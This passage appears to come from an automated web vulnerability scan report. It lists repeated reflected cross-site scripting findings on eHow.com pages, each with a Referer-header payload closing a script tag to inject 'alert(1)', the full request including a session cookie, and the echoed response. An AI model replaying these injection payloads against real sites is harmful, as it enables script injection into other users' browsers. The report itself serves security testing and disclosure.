The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 459d0</script><script>alert(1)</script>02fd6d9f1ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /legal/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=459d0</script><script>alert(1)</script>02fd6d9f1ec

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73439

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Legal - How To Information | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "459d0</script><script>alert(1)</script>02fd6d9f1ec";

       </script>
...[SNIP]...

4.646. http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/list_6515049_common-english-grammar-mistakes.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e78a0</script><script>alert(1)</script>8d81708f1d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /list_6515049_common-english-grammar-mistakes.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e78a0</script><script>alert(1)</script>8d81708f1d3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73796

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Common English Grammar Mistakes | eHow.com</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "e78a0</script><script>alert(1)</script>8d81708f1d3";

       </script>
...[SNIP]...

4.647. http://www.ehow.com/list_7189463_grammar-check-tools.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/list_7189463_grammar-check-tools.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c8b8</script><script>alert(1)</script>9bae81c40d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /list_7189463_grammar-check-tools.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8c8b8</script><script>alert(1)</script>9bae81c40d8

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73995

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Grammar Check Tools | eHow.com</title>
       <meta c
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "8c8b8</script><script>alert(1)</script>9bae81c40d8";

       </script>
...[SNIP]...

4.648. http://www.ehow.com/lose-weight/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/lose-weight/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c7b6</script><script>alert(1)</script>085f8aae691 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /lose-weight/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=2c7b6</script><script>alert(1)</script>085f8aae691

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59165

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Lose Weight - How To Information | eHow.com</titl
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "2c7b6</script><script>alert(1)</script>085f8aae691";

       </script>
...[SNIP]...

4.649. http://www.ehow.com/members.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/members.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd0e2</script><script>alert(1)</script>e6d76aa30d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /members.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=fd0e2</script><script>alert(1)</script>e6d76aa30d4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:44 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46009

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Members | eHow.com</title>
       <meta charset="UTF-
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "fd0e2</script><script>alert(1)</script>e6d76aa30d4";

       </script>
...[SNIP]...

4.650. http://www.ehow.com/mental-health/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/mental-health/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df1a</script><script>alert(1)</script>79b522071ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /mental-health/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8df1a</script><script>alert(1)</script>79b522071ca

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70558

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Mental Health - How To Information | eHow.com</ti
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "8df1a</script><script>alert(1)</script>79b522071ca";

       </script>
...[SNIP]...

4.651. http://www.ehow.com/music/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/music/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df132</script><script>alert(1)</script>95642539c8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /music/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=df132</script><script>alert(1)</script>95642539c8a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:05 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70752

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Music - How To Information | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "df132</script><script>alert(1)</script>95642539c8a";

       </script>
...[SNIP]...

4.652. http://www.ehow.com/parenting/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/parenting/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a8e2</script><script>alert(1)</script>ac0dd484a7c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /parenting/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9a8e2</script><script>alert(1)</script>ac0dd484a7c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71224

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Parenting - How To Information | eHow.com</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "9a8e2</script><script>alert(1)</script>ac0dd484a7c";

       </script>
...[SNIP]...

4.653. http://www.ehow.com/personal-finance/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/personal-finance/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 451e2</script><script>alert(1)</script>fe7844aacb6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /personal-finance/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=451e2</script><script>alert(1)</script>fe7844aacb6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:05 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72539

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Personal Finance - How To Information | eHow.com<
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "451e2</script><script>alert(1)</script>fe7844aacb6";

       </script>
...[SNIP]...

4.654. http://www.ehow.com/pets-and-animals/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/pets-and-animals/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9090e</script><script>alert(1)</script>f31899da430 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pets-and-animals/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9090e</script><script>alert(1)</script>f31899da430

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73469

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Pets & Animals - How To Information | eHow.com</t
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "9090e</script><script>alert(1)</script>f31899da430";

       </script>
...[SNIP]...

4.655. http://www.ehow.com/photos/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/photos/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66406</script><script>alert(1)</script>01977d190a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /photos/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=66406</script><script>alert(1)</script>01977d190a7

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69570

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Photos - eHow.com</title>
       <meta charset="UTF-8
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "66406</script><script>alert(1)</script>01977d190a7";

       </script>
...[SNIP]...

4.656. http://www.ehow.com/plant-care/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/plant-care/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353c9</script><script>alert(1)</script>9a8f3a3d37b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /plant-care/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=353c9</script><script>alert(1)</script>9a8f3a3d37b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70437

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Plant Care - How To Information | eHow.com</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "353c9</script><script>alert(1)</script>9a8f3a3d37b";

       </script>
...[SNIP]...

4.657. http://www.ehow.com/plants/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/plants/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5840</script><script>alert(1)</script>c6c90bc3237 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /plants/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=a5840</script><script>alert(1)</script>c6c90bc3237

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70812

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Plants - How To Information | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "a5840</script><script>alert(1)</script>c6c90bc3237";

       </script>
...[SNIP]...

4.658. http://www.ehow.com/privacy.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/privacy.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0263</script><script>alert(1)</script>c17e4ec4831 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /privacy.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c0263</script><script>alert(1)</script>c17e4ec4831

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:57 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49157

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Privacy Policy | eHow.com</title>
       <meta charse
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "c0263</script><script>alert(1)</script>c17e4ec4831";

       </script>
...[SNIP]...

4.659. http://www.ehow.com/real-estate-and-investment/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/real-estate-and-investment/

Issue detail

